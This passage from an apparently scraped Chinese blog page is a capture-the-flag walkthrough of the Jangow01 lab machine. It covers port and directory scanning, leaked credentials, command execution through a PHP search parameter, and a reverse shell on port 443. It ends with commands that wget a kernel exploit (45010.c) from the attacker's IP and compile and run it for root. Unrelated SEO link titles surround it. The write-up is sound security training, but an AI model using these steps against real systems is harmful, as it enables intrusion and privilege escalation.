当前位置: 首页 > news >正文

网页设计服装网站建设太原百度推广排名优化

网页设计服装网站建设,太原百度推广排名优化,邯郸seo优化公司,中国风景摄影网kali:192.168.223.128 主机发现 nmap -sP 192.168.223.0/24 端口扫描 nmap -p- 192.168.223.154 开启了21 80端口 web看一下,有个busque.php参数是buscar,但是不知道输入什么,尝试文件包含失败 扫描目录 dirsearch -u http://192.168.223.154 dirse…

kali:192.168.223.128

主机发现

nmap -sP 192.168.223.0/24

端口扫描

nmap -p- 192.168.223.154

开启了21 80端口

web看一下,有个busque.php参数是buscar,但是不知道输入什么,尝试文件包含失败

扫描目录

dirsearch -u http://192.168.223.154
dirsearch -u http://192.168.223.154/site

扫到一个backup并且知道这是一个wordpress服务

打开发现有账号密码

jangow01/abygurl69

前面扫到21端口ftp服务,用ftp连接

去busque看一下

原来是可以执行命令,下次测试参数的时候可以尝试RCE

反弹shell

尝试好几种反弹shell语句都失败,看了别人的wp发现靶机之开启了443端口

监听443端口发现拿到shell

在jiangow01目录下找到第一个flag

然后找提权手段

看看suid

看看定时任务

看看备份文件

没什么有用的文件

看看内核版本

Ubuntu 4.4.0-31  16.04

搜一下有没有漏洞

searchsploit ubuntu 4.4.0-31


 

发现有好几个本地提权的

45010.c更符合版本,先下载下来

searchsploit -m 45010.c

看一下内容

可以看到这是个CVE 需要编译

先传到靶机再编译(我试了先编译再上传发现执行失败,不知道什么原因)

mv 45010.c /tmp       #移至tmp目录
python -m http.server 443 #开启http服务wget http://192.168.223.128:443/45010.c  #靶机获取exp
gcc 45010.c -o exp  #编译
chmod +x exp #添加执行权限
./exp  #执行

拿到最终flag

总结1.tfp连接读取敏感文件

        2.内核提权

http://www.yayakq.cn/news/542767/

相关文章:

  • 做网站动图的软件python 和php网站开发
  • 成都装修网站制作价格百度seo关键词优化推荐
  • 有哪些网站是做分期付款的建设网站的硬件
  • wordpress 导航站模板河南省住房与城乡建设厅网站首页
  • 以数字域名为网址的网站网上推广赚钱项目
  • 做织梦网站时图片路径显示错误网站开发网站维护这行业怎么样
  • 自己做刷东西的网站公司网站
  • 电邮注册网站网站方案设计
  • 优秀设计作品网站高埗镇做网站
  • 站群管理合肥建设网站首页
  • 网站建设目标计划书福州做网站建设服务商
  • 做菠菜网站代理销售网站内容设计方案
  • thinkphp 网站模板企业做网站得多少钱
  • 做网站标题居中代码easyphp搭建wordpress
  • 网站建设合作合同注册网站多少钱
  • 网站建设模板型和定制型wordpress图片二级域名
  • 结构设计在哪个网站接单兼职做正规网站优化公司
  • 四川省住建厅官方网站软件开发与程序设计有什么不同
  • 相城网站建设wordpress建站 客户端
  • 公司网站建设费用 知乎国内精美网站
  • 钓鱼网站模板制作没有icp备案的网站
  • 怎样在网站做两份简历大连建设学校官网
  • seo搜索优化网站推广排名室内装修设计软件排行榜
  • 有哪些出名的工业设计网站网站开发一般用什么开发语言
  • 服务外包网站百度指数有什么作用
  • 广州市住宅建设发展有限公司网站第三方物流网站建设
  • 溧阳企业网站建设价格百度有几种推广方式
  • 注册了一个域名怎么做网站wordpress 解压
  • 网站开发项目规划网站素材 按钮
  • 忻州 建网站珠海 网页设计